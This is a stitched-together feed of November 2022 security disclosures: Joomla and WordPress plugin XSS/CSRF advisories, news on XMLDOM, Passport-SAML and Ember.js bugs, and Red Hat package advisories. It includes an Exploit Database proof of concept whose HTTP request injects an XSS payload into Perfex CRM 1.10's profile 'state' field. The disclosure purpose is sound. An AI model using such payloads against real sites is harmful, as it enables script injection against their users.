An issue was discovered in Joomla! 4.0.0 through 4.2.4. Inadequate filtering of potentially malicious user input leads to reflected XSS vulnerabilities in com_media.

**Security Announcements**

**\[20221101\] - Core - RXSS through reflection of user input in com\_media**

*   **Project:** Joomla!
*   **SubProject:** CMS
*   **Impact:** Low
*   **Severity:** Low
*   **Probability:** Low
*   **Versions:** 4.0.0-4.2.4
*   **Exploit type:** Reflexted XSS
*   **Reported Date:** 2022-10-28
*   **Fixed Date:** 2022-11-08
*   **CVE Number:** CVE-2022-27914

**Description**

Inadequate filtering of potentially malicious user input leads to reflected XSS vulnerabilities in com\_media..

**Affected Installs**

Joomla! CMS versions 4.0.0-4.2.4

**Solution**

Upgrade to version 4.2.5

**Contact**

The JSST at the Joomla! Security Centre.

**Reported By:** https://github.com/Denitz

*

CVE-2022-27914: Joomla! Developer Network

Auth. (admin+) Cross-Site Scripting (XSS) vulnerability in Mantenimiento web plugin <= 0.13 on WordPress.

 Verified

 Fixed

**4.8**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 0.13

PSID 

371465969b50

Classification 

Cross Site Scripting (XSS)

OWASP Top 10 

A7: Cross-Site Scripting (XSS)

Required privilege 

Requires high role user authentication like admin.

Publicly disclosed

2022-10-20

**Details**

Auth. Cross-Site Scripting (XSS) vulnerability discovered by Mika (Patchstack Alliance) in the WordPress Mantenimiento web plugin (versions <= 0.13).

**Solution**

Update the WordPress Mantenimiento web plugin to the latest available version (at least 0.14).

**References**

CVE-2022-41980: WordPress Mantenimiento web plugin <= 0.13 - Auth. Cross-Site Scripting (XSS) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) in Vladimir Anokhin's Shortcodes Ultimate plugin <= 5.12.0 on WordPress.

 Verified

 Fixed

**6.1**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 5.12.0

PSID 

42eec00642ac

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-10-13

**Details**

Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) vulnerability discovered by Dave Jong (Patchstack) in WordPress Shortcodes Ultimate plugin (versions <= 5.12.0).

**Solution**

Update the WordPress Shortcodes Ultimate plugin to the latest available version (at least 5.12.1).

**References**

CVE-2022-41136: WordPress Shortcodes Ultimate plugin <= 5.12.0 - CSRF vulnerability leading to Stored XSS - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability leading to Cross-Site Scripting (XSS) in David Anderson Testimonial Slider plugin <= 1.3.1 on WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of November 7, 2022 and is not available for download. This closure is temporary, pending a full review.

worked first time, no issues, thank you 🙂

Its Awesome plugin. I highly recommend this.

Es facil de usar, cómodo y cumple su cometido con creces. Gracias por hacerlo

I have used this plugin for close to a year. It is the only one that I have used flawlessly with all my websites. I would recommend it to anyone who wants a simple plugin that creates wonderful testimonial sliders

They should tell you the free version is not responsive before you spend an hour setting it up.

Read all 68 reviews

“Testimonial Slider” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2022-44741: Testimonial Slider

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Advanced Ads GmbH Advanced Ads – Ad Manager & AdSense plugin <= 1.31.1 on WordPress.

 Verified

 Fixed

**4.8**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 1.31.1

PSID 

f310fa25f34a

Classification 

Cross Site Scripting (XSS)

OWASP Top 10 

A7: Cross-Site Scripting (XSS)

Required privilege 

Requires high role user authentication like admin.

Publicly disclosed

2022-09-28

**Details**

Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered by Muhammad Daffa (Patchstack Alliance) in WordPress Advanced Ads – Ad Manager & AdSense plugin (versions <= 1.31.1).

**Solution**

Update the WordPress Advanced Ads – Ad Manager & AdSense plugin to the latest available version (at least 1.32.0).

**References**

CVE-2022-32776: WordPress Advanced Ads – Ad Manager & AdSense plugin <= 1.31.1 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile.

    # Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)
    # Date: 05/07/2021
    # Exploit Author: Alhasan Abbas (exploit.msf)
    # Vendor Homepage: https://www.perfexcrm.com/
    # Version: 1.10
    # Tested on: windows 10
    
    Vunlerable page: /clients/profile
    
    POC:
    ----
    POST /clients/profile HTTP/1.1
    
    Host: localhost
    
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    
    Accept-Language: en-US,en;q=0.5
    
    Accept-Encoding: gzip, deflate
    
    Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058
    
    Content-Length: 1548
    
    Origin: http://localhost
    
    Connection: close
    
    Referer: http://localhost/clients/profile
    
    Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038
    
    Upgrade-Insecure-Requests: 1
    
    
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="profile"
    
    
    
    1
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="profile_image"; filename=""
    
    Content-Type: application/octet-stream
    
    
    
    
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="firstname"
    
    
    
    adfgsg
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="lastname"
    
    
    
    fsdgfdg
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="company"
    
    
    
    test
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="vat"
    
    
    
    1
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="phonenumber"
    
    
    
    
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="country"
    
    
    
    105
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="city"
    
    
    
    asdf
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="address"
    
    
    
    asdf
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="zip"
    
    
    
    313
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="state"
    
    
    
    ""><body onload=alert("XSS")>">
    
    -----------------------------325278703021926100783634528058--
    
    then any one open profile page in user the xss its executed

CVE-2021-40303: Offensive Security’s Exploit Database Archive

Rapid remedy follows reawakening of long-dormant bug threat

Rapid remedy follows reawakening of long-dormant bug threat

A critical vulnerability arising from improper input validation has been addressed in XMLDOM, the JavaScript implementation of W3C DOM for Node.js, Rhino, and browsers.

The flawed behavior was seemingly first flagged as potentially in need of remedy in 2016. But it was only with the recent discovery of an authentication bypass in Passport-SAML, the SAML 2.0 authentication provider for Node.js library Passport, that XMLDOM maintainers tackled the root cause of the problem.

“Xmldom parses XML that is not well-formed because it contains multiple top level elements, and adds all root nodes to the childNodes collection of the Document, without reporting any error or throwing,” an XMLDOM advisory published on November 1 explained.

**Breaking the assumption**

“This breaks the assumption that there is only a single root node in the tree,” it continues, and poses “a potential issue for dependents”.

The bug was assigned CVE-2022-39353 and a severity rating of CVSS 9.4 by GitHub CVE Numbering Authority, later uprated in severity to CVSS 9.8 by the NIST National Vulnerability Database.

XMLDOM is widely used, with NPM detecting 2.8 million weekly downloads (albeit caveats apply regarding the accuracy of download counts).

DON’T MISS Gatsby patches SSRF, XSS bugs in Cloud Image CDN

Kurt Boberg, a maintainer on the project, told The Daily Swig: “Any security-critical workflow that accepts partial signatures on XML and reads a child node is likely affected by this issue.

“The core problem is that you can supply two XML documents to a request (one valid, one forged) and as long as the validator accepts the legitimate one, a property read via xmldom can potentially read a node value out of the forged document.”

**Passport-SAML bypass**

Passport-SAML, which has 167,000 weekly NPM downloads, mishandled cryptographic signature verification because of the XMLDOM flaw. Tracked as CVE-2022-39299, the high severity Passport-SAML issue potentially enabled an attacker “to bypass SAML authentication on a website using passport-saml,” The CVE description said.

“A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered.”

The bug, assigned a severity score of CVSS 8.1, was patched on October 11.

**‘Worst possible outcome’**

Asked what other damage an attacker might potentially cause downstream of the XMLDOM bug, Boberg said it “really depends on the expectations around the XML parsing. The aforementioned SAML issue is pretty much the worst possible outcome.

Read more of the latest cybersecurity vulnerability news

“It really hinges on the parsing application making a security decision based on XML input from the user that it expects to be signed. It’s like stapling an additional page to a notarized document, and passing it through a verification process that only checks if the first page is notarized.”

He added: “The downstream impact depends entirely on what the legitimate document would let you do.”

**Path to a patch**

The related GitHub bug thread began in 2016, when an XMLDOM maintainer said the issue “appears to me to be a violation of the W3C DOM Level 2 Core Specification”.

Speculating that the flaw “might be a ‘false-positive’ bug”, he suggested “there is some utility in being able to parse multiple documents in a single stream, if the API can be re-tooled just a bit”. He also described doing so “silently without issuing even so much as a warning to consumers” as “odd”.

The thread then remained dormant until the emergence of the Passport-SAML vulnerability and its root cause quickly became apparent, prompting the rapid deployment of patches within @xmldom/xmldom NPM versions 0.7.7, 0.8.4, and 0.9.0-beta.4, together with mitigations, fix details, and advice to developers to align with the specs to avoid code breakage.

YOU MIGHT ALSO LIKE OpenSSL vulnerability downgraded to ‘high’ severity

Passport-SAML auth bypass triggers fix of critical, upstream XMLDOM bug

Red Hat Security Advisory 2022-7830-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: nodejs:14 security update  
Advisory ID:       RHSA-2022:7830-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7830  
Issue date:        2022-11-08  
CVE Names:         CVE-2021-44531 CVE-2021-44532 CVE-2021-44533  
                   CVE-2022-21824 CVE-2022-35256  
====================================================================  
1. Summary:

An update for the nodejs:14 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* nodejs: Improper handling of URI Subject Alternative Names  
(CVE-2021-44531)

* nodejs: Certificate Verification Bypass via String Injection  
(CVE-2021-44532)

* nodejs: Incorrect handling of certificate subject and issuer fields  
(CVE-2021-44533)

* nodejs: HTTP Request Smuggling due to incorrect parsing of header fields  
(CVE-2022-35256)

* nodejs: Prototype pollution via console.table properties (CVE-2022-21824)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2040839 - CVE-2021-44531 nodejs: Improper handling of URI Subject Alternative Names  
2040846 - CVE-2021-44532 nodejs: Certificate Verification Bypass via String Injection  
2040856 - CVE-2021-44533 nodejs: Incorrect handling of certificate subject and issuer fields  
2040862 - CVE-2022-21824 nodejs: Prototype pollution via console.table properties  
2130518 - CVE-2022-35256 nodejs: HTTP Request Smuggling due to incorrect parsing of header fields

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-14.20.1-2.module+el8.7.0+16991+b0a68a3e.src.rpm  
nodejs-nodemon-2.0.19-2.module+el8.7.0+16991+b0a68a3e.src.rpm  
nodejs-packaging-23-3.module+el8.3.0+6519+9f98ed83.src.rpm

aarch64:  
nodejs-14.20.1-2.module+el8.7.0+16991+b0a68a3e.aarch64.rpm  
nodejs-debuginfo-14.20.1-2.module+el8.7.0+16991+b0a68a3e.aarch64.rpm  
nodejs-debugsource-14.20.1-2.module+el8.7.0+16991+b0a68a3e.aarch64.rpm  
nodejs-devel-14.20.1-2.module+el8.7.0+16991+b0a68a3e.aarch64.rpm  
nodejs-full-i18n-14.20.1-2.module+el8.7.0+16991+b0a68a3e.aarch64.rpm  
npm-6.14.17-1.14.20.1.2.module+el8.7.0+16991+b0a68a3e.aarch64.rpm

noarch:  
nodejs-docs-14.20.1-2.module+el8.7.0+16991+b0a68a3e.noarch.rpm  
nodejs-nodemon-2.0.19-2.module+el8.7.0+16991+b0a68a3e.noarch.rpm  
nodejs-packaging-23-3.module+el8.3.0+6519+9f98ed83.noarch.rpm

ppc64le:  
nodejs-14.20.1-2.module+el8.7.0+16991+b0a68a3e.ppc64le.rpm  
nodejs-debuginfo-14.20.1-2.module+el8.7.0+16991+b0a68a3e.ppc64le.rpm  
nodejs-debugsource-14.20.1-2.module+el8.7.0+16991+b0a68a3e.ppc64le.rpm  
nodejs-devel-14.20.1-2.module+el8.7.0+16991+b0a68a3e.ppc64le.rpm  
nodejs-full-i18n-14.20.1-2.module+el8.7.0+16991+b0a68a3e.ppc64le.rpm  
npm-6.14.17-1.14.20.1.2.module+el8.7.0+16991+b0a68a3e.ppc64le.rpm

s390x:  
nodejs-14.20.1-2.module+el8.7.0+16991+b0a68a3e.s390x.rpm  
nodejs-debuginfo-14.20.1-2.module+el8.7.0+16991+b0a68a3e.s390x.rpm  
nodejs-debugsource-14.20.1-2.module+el8.7.0+16991+b0a68a3e.s390x.rpm  
nodejs-devel-14.20.1-2.module+el8.7.0+16991+b0a68a3e.s390x.rpm  
nodejs-full-i18n-14.20.1-2.module+el8.7.0+16991+b0a68a3e.s390x.rpm  
npm-6.14.17-1.14.20.1.2.module+el8.7.0+16991+b0a68a3e.s390x.rpm

x86_64:  
nodejs-14.20.1-2.module+el8.7.0+16991+b0a68a3e.x86_64.rpm  
nodejs-debuginfo-14.20.1-2.module+el8.7.0+16991+b0a68a3e.x86_64.rpm  
nodejs-debugsource-14.20.1-2.module+el8.7.0+16991+b0a68a3e.x86_64.rpm  
nodejs-devel-14.20.1-2.module+el8.7.0+16991+b0a68a3e.x86_64.rpm  
nodejs-full-i18n-14.20.1-2.module+el8.7.0+16991+b0a68a3e.x86_64.rpm  
npm-6.14.17-1.14.20.1.2.module+el8.7.0+16991+b0a68a3e.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-44531  
https://access.redhat.com/security/cve/CVE-2021-44532  
https://access.redhat.com/security/cve/CVE-2021-44533  
https://access.redhat.com/security/cve/CVE-2022-21824  
https://access.redhat.com/security/cve/CVE-2022-35256  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2pSMNzjgjWX9erEAQiFmA/+PFsIM04d2Gzf9L0EzhYopvP+2hpQ3oXe  
rxs1jY17w/shvRUvBEcfFGwjqkw+9BROLnY76riBWXvS4cLdic/GaVoDYA053Swv  
qg47PgZuYgyM6Vj0ggqnN4pmN+4ydnGQnfCY5enQMZuUEEtkoP1kKj/r0b14G2Qb  
QAfRjS4kIBsIqdfWVLmB2ADyG4/RErrmQznmqnI+NgyVed+EcHQwKDXWJxQAcf1d  
bSWPPiYxKDMjl4prvFCIO4j5HIMcSxX2ydCuzU+unzdAzEVfhksJvug4vJOhI/tj  
vLbNYpb32szyWDF8RKqBCxqtpSFL+Rj1dSB9S8vLRD1vdme8GcY0bb4RMT5A7rxG  
vxboN1UnFBVasytToFrVMb6YI0hRIbY6u/AEDr7FpuZlc75IeBDuTrd513g0/JV2  
3s7uSktUx+5CLE6yTcbjNFzyxt/CWlXYRLxDjei4PAgTHUob0XV4ceegiSQtIrJR  
BsDZ92Rl3fL0h5ifQyX852F4aYDdN4wUNeaOL6dDh8I/O7YTdmwVrFJOsCaJbuW2  
eEEezk6n3EsGA0GUu3g4llzynyE+kbEVM03ZycSVeL5Rg14p05nabXiYy22r3fKq  
oKo6QsdExSS+8yzDLVpug1B8LUbQ9KjA3TwkuSpAFzLFF4Gdf9TDT81cXMnxoYbU  
9kKLmbdmAnM=ZgF8  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7830-01

Unsanitized user input risk spotted in JavaScript framework

Ben Dickson 08 November 2022 at 12:16 UTC

Unsanitized user input risk spotted in JavaScript framework

A bug in Ember.js, a JavaScript framework for building Node.js web applications, allowed attackers to stage prototype pollution attacks against the host server.

Prototype pollution attacks take advantage of JavaScript’s dynamic property-assignment features to make global changes to critical objects. In the case of Ember.js, the prototype pollution vulnerability could potentially allow attackers to stage cross-site scripting (XSS) attacks and steal user information.

**Untrusted input**

Masato Kinugawa, the security researcher who discovered the bug, first caught sight of it during another investigation.

“In spring 2021, I noticed an XSS bug in one of the domains owned by Google, and I reported it through the Google Bug Bounty Program,” Kinugawa told The Daily Swig. “When investigating the details, I noticed that the root cause was in the Ember.js framework.”

According to Kinugawa’s findings, if an application passes unsanitized user input to some of the property-setting functions of Ember.js objects, it can lead to prototype pollution.

RELATED Prototype pollution: The dangerous and underrated vulnerability impacting JavaScript applications

In essence, this means that the attacker can use the property function to traverse the object prototype and make changes to other parts of the JavaScript program, including the base object from which all other objects are derived.

The prototype pollution bug could potentially be chained with other vulnerabilities in the target application to carry out other malicious activities, including stealing credentials.

To abuse the flaw, an attacker would need a script gadget that accesses the vulnerable property setter. “In the case of Google's bug, I was able to use a Google reCAPTCHA gadget because the app used the reCAPTCHA script,” Kinugawa explained.

**Feature or bug?**

The capability to make dynamic changes to object structures and prototypes is one of the features that make JavaScript flexible. However, this also creates a challenge for developers, who must make sure property changes avoid resulting in prototype pollution vulnerabilities, especially when the changes are coming through user input.

“While deep property chaining is an intended feature of these APIs, and passing untrusted input to them is ill-advised, we agree that this behavior is surprising enough to constitute an increased security risk,” Ember said in an advisory.

A new version of the framework explicitly prevents the previously vulnerable functions from making changes to the object prototype.

Prototype pollution bugs remain elusive as they are not well understood by developers. Kinugawa provided some hints on how software developers might find similar vulnerabilities in their programs and the libraries they use.

“In most cases that I've found, the \[prototype\] pollution happened when converting the URL parameters to JavaScript object,” Kinugawa said. “So, anyone trying to find this type of bug should be able to find it by looking carefully at the URL parameter handling.”

RELATED React-based open source framework Gatsby patches SSRF, XSS bugs in Cloud Image CDN

Prototype pollution bug exposed Ember.js applications to XSS

An update for libxml2 is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2016-3709: libxml2: Incorrect server side include parsing can lead to XSS


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-11-08

Updated:

2022-11-08

**RHSA-2022:7715 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: libxml2 security update

**Type/Severity**

Security Advisory: Moderate

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for libxml2 is now available for Red Hat Enterprise Linux 8.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

The libxml2 library is a development toolbox providing the implementation of various XML standards.  

Security Fix(es):  

*   libxml2: Incorrect server side include parsing can lead to XSS (CVE-2016-3709)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

Additional Changes:  

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.7 Release Notes linked from the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

The desktop must be restarted (log out, then log back in) for this update to take effect.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 8 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 8 s390x
*   Red Hat Enterprise Linux for Power, little endian 8 ppc64le
*   Red Hat Enterprise Linux for ARM 64 8 aarch64

**Fixes**

*   BZ - 2112766 - CVE-2016-3709 libxml2: Incorrect server side include parsing can lead to XSS

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/documentation/en-us/red\_hat\_enterprise\_linux/8/html/8.7\_release\_notes/index

**Red Hat Enterprise Linux for x86\_64 8**

SRPM

libxml2-2.9.7-15.el8.src.rpm

SHA-256: e563a721d4dc02146f6efa6e928f7fc7655aad9600d5f4ba993a6434fb3318d0

x86\_64

libxml2-2.9.7-15.el8.i686.rpm

SHA-256: 6829a196ad4d7dd5b3fef3028dcdea90ef9d3b8431a3f04c67372de85c89a25e

libxml2-2.9.7-15.el8.x86\_64.rpm

SHA-256: 9911a687cf9fa747a7c9c35d6d166289f76af411462c9f0a3502b72e74f211db

libxml2-debuginfo-2.9.7-15.el8.i686.rpm

SHA-256: ffb1fe8a1671978abf53ad9447d801130cc64246fb9b9af22b69b855cdbc993c

libxml2-debuginfo-2.9.7-15.el8.i686.rpm

SHA-256: ffb1fe8a1671978abf53ad9447d801130cc64246fb9b9af22b69b855cdbc993c

libxml2-debuginfo-2.9.7-15.el8.x86\_64.rpm

SHA-256: 493a098fd28494b90bd4f09599478b8fa36dddcde455df296311e3ec7c7f7e8a

libxml2-debuginfo-2.9.7-15.el8.x86\_64.rpm

SHA-256: 493a098fd28494b90bd4f09599478b8fa36dddcde455df296311e3ec7c7f7e8a

libxml2-debugsource-2.9.7-15.el8.i686.rpm

SHA-256: e9354d5d885067983be080f73a18f2d8e217dd74aaff09b5c806e8fd861d5719

libxml2-debugsource-2.9.7-15.el8.i686.rpm

SHA-256: e9354d5d885067983be080f73a18f2d8e217dd74aaff09b5c806e8fd861d5719

libxml2-debugsource-2.9.7-15.el8.x86\_64.rpm

SHA-256: 1053a5db7b6ad0aff1facac51b63a4c7386ea4267386d8461ff03808d8c99705

libxml2-debugsource-2.9.7-15.el8.x86\_64.rpm

SHA-256: 1053a5db7b6ad0aff1facac51b63a4c7386ea4267386d8461ff03808d8c99705

libxml2-devel-2.9.7-15.el8.i686.rpm

SHA-256: ee1b2005d560194b64aaaf712c386321372050dab561ee060f7e8d35e9337376

libxml2-devel-2.9.7-15.el8.x86\_64.rpm

SHA-256: 72ef2b23530edaa21f36a9844958530dae1b7cd103ae4a309025d94f2758066e

python3-libxml2-2.9.7-15.el8.x86\_64.rpm

SHA-256: 647f876d995a658d94b6643067ee1e1c48d5059e3422eca34ba09f94c90ec785

python3-libxml2-debuginfo-2.9.7-15.el8.i686.rpm

SHA-256: 6a5eb12444b4177b6e19bf5970d9014d2b854990317411ff79e636eff3ea97b7

python3-libxml2-debuginfo-2.9.7-15.el8.i686.rpm

SHA-256: 6a5eb12444b4177b6e19bf5970d9014d2b854990317411ff79e636eff3ea97b7

python3-libxml2-debuginfo-2.9.7-15.el8.x86\_64.rpm

SHA-256: febd613267d6e020cf054a2f02e806b5304a768a66680dd0a63d4bb43f9198bd

python3-libxml2-debuginfo-2.9.7-15.el8.x86\_64.rpm

SHA-256: febd613267d6e020cf054a2f02e806b5304a768a66680dd0a63d4bb43f9198bd

**Red Hat Enterprise Linux for IBM z Systems 8**

SRPM

libxml2-2.9.7-15.el8.src.rpm

SHA-256: e563a721d4dc02146f6efa6e928f7fc7655aad9600d5f4ba993a6434fb3318d0

s390x

libxml2-2.9.7-15.el8.s390x.rpm

SHA-256: 7dfff5e351126a6d268fc2627e1d5882f50a29608b623271bcca3f51ef606ff1

libxml2-debuginfo-2.9.7-15.el8.s390x.rpm

SHA-256: 1a35be3cd74d4c9e3b64d6fbe34615a620b9da97329bd6f4fc10e03bc0b512a7

libxml2-debuginfo-2.9.7-15.el8.s390x.rpm

SHA-256: 1a35be3cd74d4c9e3b64d6fbe34615a620b9da97329bd6f4fc10e03bc0b512a7

libxml2-debugsource-2.9.7-15.el8.s390x.rpm

SHA-256: d92b68d723c6b082500258d5b6259ff8984ad9936255fa41cdfb00dbaa6b203f

libxml2-debugsource-2.9.7-15.el8.s390x.rpm

SHA-256: d92b68d723c6b082500258d5b6259ff8984ad9936255fa41cdfb00dbaa6b203f

libxml2-devel-2.9.7-15.el8.s390x.rpm

SHA-256: e3e237d1a7622d04717555a38dbd80463c17b5fa06234d8ac94b66e71f7d8b5f

python3-libxml2-2.9.7-15.el8.s390x.rpm

SHA-256: 8f18f69605d7a9464336829340644609ef8d39ca1cb54e6dbd80983083e8d681

python3-libxml2-debuginfo-2.9.7-15.el8.s390x.rpm

SHA-256: e28c38fe46391561002ece60d01bbc09b3dc71efa26d950780bf56208aaf03e3

python3-libxml2-debuginfo-2.9.7-15.el8.s390x.rpm

SHA-256: e28c38fe46391561002ece60d01bbc09b3dc71efa26d950780bf56208aaf03e3

**Red Hat Enterprise Linux for Power, little endian 8**

SRPM

libxml2-2.9.7-15.el8.src.rpm

SHA-256: e563a721d4dc02146f6efa6e928f7fc7655aad9600d5f4ba993a6434fb3318d0

ppc64le

libxml2-2.9.7-15.el8.ppc64le.rpm

SHA-256: 7fc6f6ddef32dfe304d8b93abd7406dbc57d80094ca375eeaa9eae0b6321f36b

libxml2-debuginfo-2.9.7-15.el8.ppc64le.rpm

SHA-256: ff4a9b712cf17be9f67ea9aa980d3b35c7c6c7c27447a4f7004c91e93c69b954

libxml2-debuginfo-2.9.7-15.el8.ppc64le.rpm

SHA-256: ff4a9b712cf17be9f67ea9aa980d3b35c7c6c7c27447a4f7004c91e93c69b954

libxml2-debugsource-2.9.7-15.el8.ppc64le.rpm

SHA-256: bc43a9e31d15b420985c9b4700ef7937fe90d3ee1bc03f5efdaed9786904043e

libxml2-debugsource-2.9.7-15.el8.ppc64le.rpm

SHA-256: bc43a9e31d15b420985c9b4700ef7937fe90d3ee1bc03f5efdaed9786904043e

libxml2-devel-2.9.7-15.el8.ppc64le.rpm

SHA-256: b416b5be68bffd889b568474eb5b28c33386a2b98b0678ba79766d66ba3d0e15

python3-libxml2-2.9.7-15.el8.ppc64le.rpm

SHA-256: c87e4ae9624fec5310e92a0c2d31829dcbc8a2fe4cfd581e4ec1d9a7fb31307f

python3-libxml2-debuginfo-2.9.7-15.el8.ppc64le.rpm

SHA-256: 9f95c167abfbdb42601d53285ada3c03b9dcc59e8e452668f303069d6254d8cf

python3-libxml2-debuginfo-2.9.7-15.el8.ppc64le.rpm

SHA-256: 9f95c167abfbdb42601d53285ada3c03b9dcc59e8e452668f303069d6254d8cf

**Red Hat Enterprise Linux for ARM 64 8**

SRPM

libxml2-2.9.7-15.el8.src.rpm

SHA-256: e563a721d4dc02146f6efa6e928f7fc7655aad9600d5f4ba993a6434fb3318d0

aarch64

libxml2-2.9.7-15.el8.aarch64.rpm

SHA-256: e7c7465ba41f483d06bbdd8dc82fa73709f47793df1dc2165355213010ea5ec6

libxml2-debuginfo-2.9.7-15.el8.aarch64.rpm

SHA-256: 5264ee9caf7408efaf7b4d6c92b50a9e5996dcf04298fb253d238fb794949064

libxml2-debuginfo-2.9.7-15.el8.aarch64.rpm

SHA-256: 5264ee9caf7408efaf7b4d6c92b50a9e5996dcf04298fb253d238fb794949064

libxml2-debugsource-2.9.7-15.el8.aarch64.rpm

SHA-256: 605c51f08a4620c881d505cf39d28a7edebf07f3d83b1e36383c8451a462ed3d

libxml2-debugsource-2.9.7-15.el8.aarch64.rpm

SHA-256: 605c51f08a4620c881d505cf39d28a7edebf07f3d83b1e36383c8451a462ed3d

